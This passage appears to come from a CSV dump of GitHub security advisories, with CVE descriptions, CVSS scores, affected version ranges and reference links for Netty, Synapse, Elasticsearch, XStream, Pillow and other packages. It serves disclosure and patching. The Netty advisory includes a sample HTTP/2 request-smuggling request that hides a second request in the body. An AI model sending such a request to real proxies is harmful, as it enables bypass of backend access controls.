+Validation can be done by the user before proxy the request by validating the header.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec-http2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.61.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21409'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/b0fa4d5aab4215f3c22ce6123dd8dd5f38dc0432'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21295'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b09f3e31e004fe583f677f7afa46bd30110904576c13c5ac818ac2c@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0ca82fec33334e571fe5b388272260778883e307e15415d7b1443de2@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r101f82d8f3b5af0bf79aecbd5b2dd3b404f6bb51d1a54c2c3d29bed9@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b3cb056364794f919aaf26ceaf7423de64e7fdd05a914066e7d5219@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2732aa3884cacfecac4c54cfaa77c279ba815cad44b464a567216f83@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r31044fb995e894749cb821c6fe56f487c16a97028e6e360e59f09d58@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a98827bb4a7edbd69ef862f2351391845697c40711820d10df52ca5@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b8be87acf5b9c098a2ee350b5ca5716fe7afeaf0a21a4ee45a90687@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ea2f1a9d79d4fc1896e085f31fb60a21b1770d0a26a5250f849372d@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5baac01f9e06c40ff7aab209d5751b3b58802c63734e33324b70a06a@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5cbea8614812289a9b98d0cfc54b47f54cef424ac98d5e315b791795@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f2f120b2b8d099226473db1832ffb4d7c1d6dc2d228a164bf293a8e@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r602e98daacc98934f097f07f2eed6eb07c18bfc1949c8489dc7bfcf5@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61564d86a75403b854cdafee67fc69c8b88c5f6802c2c838f4282cc8@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r69efd8ef003f612c43e4154e788ca3b1f837feaacd16d97854402355@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6dac9bd799ceac499c7a7e152a9b0dc7f2fe7f89ec5605d129bb047b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70c3a7bfa904f06a1902f4df20ee26e4f09a46b8fd3eb304dc57a2de@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7879ddcb990c835c6b246654770d836f9d031dee982be836744e50ed@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7b54563abebe3dbbe421e1ba075c2030d8d460372f8c79b7789684b6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r823d4b27fcba8dad5fe945bdefce3ca5a0031187966eb6ef3cc22ba9@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r855b4b6814ac829ce2d48dd9d8138d07f33387e710de798ee92c011e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r967002f0939e69bdec58f070735a19dd57c1f2b8f817949ca17cddae@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ec78dc409f3f1edff88f21cab53737f36aad46f582a9825389092e0@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9fe840c36b74f92b8d4a089ada1f9fd1d6293742efa18b10e06b66d2@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra64d56a8a331ffd7bdcd24a9aaaeeedeacd5d639f5a683389123f898@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra655e5cec74d1ddf62adacb71d398abd96f3ea2c588f6bbf048348eb@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra66e93703e3f4bd31bdfd0b6fb0c32ae96b528259bb1aa2b6d38e401@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raa413040db6d2197593cc03edecfd168732e697119e6447b0a25d525@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rac8cf45a1bab9ead5c9a860cbadd6faaeb7792203617b6ec3874736d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rafc77f9f03031297394f3d372ccea751b23576f8a2ae9b6b053894c5@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba2a9ef1d0af882ab58fadb336a58818495245dda43d32a7d7837187@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbde2f13daf4911504f0eaea43eee4f42555241b5f6d9d71564b6c5fa@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca0978b634a0c3ebee4126ec29c7f570b165fae3f8f3658754c1cbd3@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcae42fba06979934208bbd515584b241d3ad01d1bb8b063512644362@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4a6b7dec38ea6cd28b6f94bd4b312629a52b80be3786d5fb0e474bc@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd206d9dd7eb894cc089b37fe6edde2932de88d63a6d8368b44f5101@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd5715f3ee5e3216d5e0083a07994f67da6dbb9731ce9e7a6389b18e@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re1911e05c08f3ec2bab85744d788773519a0afb27272a31ac2a0b4e8@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re39391adcb863f0e9f3f15e7986255948f263f02e4700b82453e7102@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4b0141939370304d676fe23774d0c6fbc584b648919825402d0cb39@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re7c69756a102bebce8b8681882844a53e2f23975a189363e68ad0324@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re9e6ed60941da831675de2f8f733c026757fb4fa28a7b6c9f3dfb575@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/redef0fb5474fd686781007de9ddb852b24f1b04131a248d9a4789183@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf148b2bf6c2754153a8629bc7495e216bd0bd4c915695486542a10b4@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf38e4dcdefc7c59f7ba0799a399d6d6e37b555d406a1dfc2fcbf0b35@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf521ff2be2e2dd38984174d3451e6ee935c845948845c8fccd86371d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf934292a4a1c189827f625d567838d2c1001e4739b158638d844105b@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4885'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T15:03:26Z', 'nvd_published_at': '2021-03-30T15:15:00Z'}"
+1.4.0,GHSA-c5f8-35qr-q4fm,2021-08-31T21:07:06Z,2021-03-26T19:53:04Z,,['CVE-2021-21333'],HTML injection in email and account expiry notifications,"### Impact
+The notification emails sent for notifications for missed messages or for an expiring account are subject to HTML injection. In the case of the notification for missed messages, this could allow an attacker to insert forged content into the email.
+
+The account expiry feature is not enabled by default and the HTML injection is not controllable by an attacker.
+
+### Patches
+This issue is fixed in #9200.
+
+### Workarounds
+For the missed messages notifications:
+
+The `notif.html`, `notif_mail.html`, and `room.html` templates can be overridden with custom templates that manually escapes the variables using [JInja2's `escape` filter](https://jinja.palletsprojects.com/en/2.11.x/templates/#escape). See the `email.template_dir` setting.
+
+For the account expiry notifications:
+
+1. Account expiry can be disabled via the `account_validity.enabled` setting.
+
+2. The `notice_expiry.html` template can be overridden with a custom template that manually escapes the variables using [JInja2's `escape` filter](https://jinja.palletsprojects.com/en/2.11.x/templates/#escape). See the `email.template_dir` setting.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-c5f8-35qr-q4fm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21333'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9200'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/e54746bdf7d5c831eabe4dcea76a7626f1de73df'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.27.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}]","{'cwe_ids': ['CWE-74', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T19:52:46Z', 'nvd_published_at': '2021-03-26T20:15:00Z'}"
+1.4.0,GHSA-hwvv-438r-mhvj,2022-04-22T16:50:19Z,2021-03-18T19:23:57Z,,['CVE-2021-22134'],Exposure of Sensitive Information to an Unauthorized Actor,A document disclosure flaw was found in Elasticsearch versions after 7.6.0 and before 7.11.0 when Document or Field Level Security is used. Get requests do not properly apply security permissions when executing a query against a recently updated document. This affects documents that have been updated and not yet refreshed in the index. This could result in the search disclosing the existence of documents and fields the attacker should not be able to view.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.6.0'}, {'fixed': '7.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22134'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-stack-7-11-0-security-update/265835'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-200', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T21:17:57Z', 'nvd_published_at': '2021-03-08T21:15:00Z'}"
+1.4.0,GHSA-cwp9-956f-vcwh,2021-03-22T22:56:04Z,2021-03-29T20:57:56Z,,['CVE-2019-1141'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1139, CVE-2019-1140, CVE-2019-1195, CVE-2019-1196, CVE-2019-1197.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1141'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/329d9d213e7b286349c0b156be4b5a088555de90'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1141'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:56:04Z', 'nvd_published_at': '2019-08-14T21:15:00Z'}"
+1.4.0,GHSA-vx3p-948g-6vhq,2021-10-21T17:38:11Z,2021-03-19T21:24:36Z,,['CVE-2021-27290'],Regular Expression Denial of Service (ReDoS),"npm `ssri` 5.2.2-6.0.1 and 7.0.0-8.0.0, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ssri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.2'}, {'fixed': '6.0.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ssri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.1.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ssri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.1'}]}], 'versions': ['8.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27290'}, {'type': 'WEB', 'url': 'https://github.com/npm/ssri/pull/20#issuecomment-842677644'}, {'type': 'WEB', 'url': 'https://github.com/npm/ssri/commit/76e223317d971f19e4db8191865bdad5edee40d2'}, {'type': 'WEB', 'url': 'https://github.com/npm/ssri/commit/809c84d09ea87c3857fa171d42914586899d4538'}, {'type': 'WEB', 'url': 'https://github.com/npm/ssri/commit/b30dfdb00bb94ddc49a25a85a18fb27afafdfbb1'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'WEB', 'url': 'https://doyensec.com/resources/Doyensec_Advisory_ssri_redos.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/ssri'}, {'type': 'WEB', 'url': 'https://github.com/yetingli/SaveResults/blob/main/pdf/ssri-redos.pdf'}, {'type': 'WEB', 'url': 'https://npmjs.com'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/ssri'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-15T18:24:30Z', 'nvd_published_at': '2021-03-12T22:15:00Z'}"
+1.4.0,GHSA-4rv9-5vc4-88cg,2021-03-16T00:59:16Z,2021-03-19T21:21:06Z,,['CVE-2020-7785'],Command injection in node-ps,This affects all versions of package node-ps. The injection point is located in line 72 in lib/index.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-ps'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7785'}, {'type': 'WEB', 'url': 'https://github.com/fortruce/node-ps/blob/master/lib/index.js#L72'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEPS-1048335'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/node-ps'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T00:59:16Z', 'nvd_published_at': '2021-02-08T19:15:00Z'}"
+1.4.0,GHSA-2p3x-qw9c-25hh,2022-02-08T21:33:42Z,2021-03-22T23:27:51Z,,['CVE-2021-21341'],XStream can cause a Denial of Service.,"### Impact
+The vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21341](https://x-stream.github.io/CVE-2021-21341.html).
+
+### Credits
+The vulnerability was discovered and reported by threedr3am.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-2p3x-qw9c-25hh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21341'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21341.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-400', 'CWE-502', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:23:33Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-8xjq-8fcg-g5hw,2023-09-04T16:24:09Z,2021-03-29T16:35:36Z,,['CVE-2021-25290'],Out-of-bounds Write in Pillow,"An issue was discovered in Pillow before 8.1.1. In TiffDecode.c, there is a negative-offset memcpy with an invalid size.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25290'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/86f02f7c70862a0954bfe8133736d352db978eaa'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00018.html'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:06:28Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}"
+1.4.0,GHSA-wm47-8v5p-wjpj,2021-08-31T21:19:12Z,2021-03-09T18:49:49Z,,['CVE-2021-21295'],Possible request smuggling in HTTP/2 due missing validation,"### Impact
+If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1.
+If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling.
+
+In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked.
+
+An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. A sample attack request looks like:
+
+```
+POST / HTTP/2
+:authority:: externaldomain.com
+Content-Length: 4
+
+asdfGET /evilRedirect HTTP/1.1
+Host: internaldomain.com
+```
+
+Users are only affected if all of this is `true`:
+ * `HTTP2MultiplexCodec` or `Http2FrameCodec` is used
+ * `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects
+ * These HTTP/1.1 objects are forwarded to another remote peer.
+
+
+### Patches
+This has been patched in 4.1.60.Final
+
+### Workarounds
+The user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.
+
+### References
+Related change to workaround the problem: https://github.com/Netflix/zuul/pull/980 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec-http2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.60.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21295'}, {'type': 'WEB', 'url': 'https://github.com/Netflix/zuul/pull/980'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02e467123d45006a1dda20a38349e9c74c3a4b53e2e07be0939ecb3f@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r040a5e4d9cca2f98354b58a70b27099672276f66995c4e2e39545d0b@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b09f3e31e004fe583f677f7afa46bd30110904576c13c5ac818ac2c@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r15f66ada9a5faf4bac69d9e7c4521cedfefa62df9509881603791969@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1908a34b9cc7120e5c19968a116ddbcffea5e9deb76c2be4fa461904@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1bca0b81193b74a451fc6d687ab58ef3a1f5ec40f6c61561d8dd9509@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r22adb45fe902aeafcd0a1c4db13984224a667676c323c66db3af38a1@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r22b2f34447d71c9a0ad9079b7860323d5584fb9b40eb42668c21eaf1@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r268850f26639ebe249356ed6d8edb54ee8943be6f200f770784fb190@%3Cissues.hbase.apache.org%3E'}, {'type': 